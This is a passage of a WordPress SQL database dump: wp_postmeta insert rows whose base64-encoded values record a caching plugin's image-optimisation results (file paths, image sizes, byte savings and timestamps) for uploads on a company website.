aGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjYwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDgsInRpbWUiOjE0ODM1NjUzMjcsImlkIjoxNzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI2MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI2MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTk2NSwidGltZSI6MTQ4MzU2NTMzMCwiaWQiOjE3NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxNCwidGltZSI6MTQ4MzU2NTMzMywiaWQiOjE3NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUzNSwidGltZSI6MTQ4MzU2NTMzNywiaWQiOjE3NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY3MCwidGltZSI6MTQ4MzU2NTM0MCwiaWQiOjE3NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk4MCwidGltZSI6MTQ4MzU2NTM0MywiaWQiOjE3NDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNjAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjYwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNjAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjUzNDcsImlkIjoxNzQ3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29262, 1746, 'wpfc_optimisation_reduction', '26414'); 
INSERT INTO `wp_postmeta` VALUES (29263, 1746, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjUzNTEsImlkIjoiMTc0NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjU1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MDgsInRpbWUiOjE0ODM1NjUzNTUsImlkIjoxNzQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzEzMCwidGltZSI6MTQ4MzU2NTM1OCwiaWQiOjE3NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjU1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNzQ5LCJ0aW1lIjoxNDgzNTY1MzYxLCJpZCI6MTc0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMxNTEsInRpbWUiOjE0ODM1NjUzNjYsImlkIjoxNzQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjAzLCJ0aW1lIjoxNDgzNTY1MzY5LCJpZCI6MTc0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxOCwidGltZSI6MTQ4MzU2NTM3MiwiaWQiOjE3NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjU1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTQsInRpbWUiOjE0ODM1NjUzNzUsImlkIjoxNzQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg3OSwidGltZSI6MTQ4MzU2NTM3OSwiaWQiOjE3NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMywidGltZSI6MTQ4MzU2NTM4MiwiaWQiOjE3NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjUzNywidGltZSI6MTQ4MzU2NTM4NSwiaWQiOjE3NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzMSwidGltZSI6MTQ4MzU2NTM4OSwiaWQiOjE3NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjkxMCwidGltZSI6MTQ4MzU2NTM5MiwiaWQiOjE3NDZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTUtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjU1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTUtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTEsInRpbWUiOjE0ODM1NjUzOTUsImlkIjoxNzQ2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29264, 1745, 'wpfc_optimisation_reduction', '26787'); 
INSERT INTO `wp_postmeta` VALUES (29265, 1745, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjU0MDAsImlkIjoiMTc0NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjUwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4OTksInRpbWUiOjE0ODM1NjU0MDMsImlkIjoxNzQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzE0NSwidGltZSI6MTQ4MzU2NTQwNywiaWQiOjE3NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjUwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyODE4LCJ0aW1lIjoxNDgzNTY1NDEwLCJpZCI6MTc0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTMzMzMsInRpbWUiOjE0ODM1NjU0MTQsImlkIjoxNzQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTI1MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjA3LCJ0aW1lIjoxNDgzNTY1NDE4LCJpZCI6MTc0NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0yNTAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0yNTAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNiwidGltZSI6MTQ4MzU2NTQyMSwiaWQiOjE3NDV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMjUwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMjUwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1OTAsInRpbWUiOjE0ODM1NjU0MjQsImlkIjoxNzQ1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTI1MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TL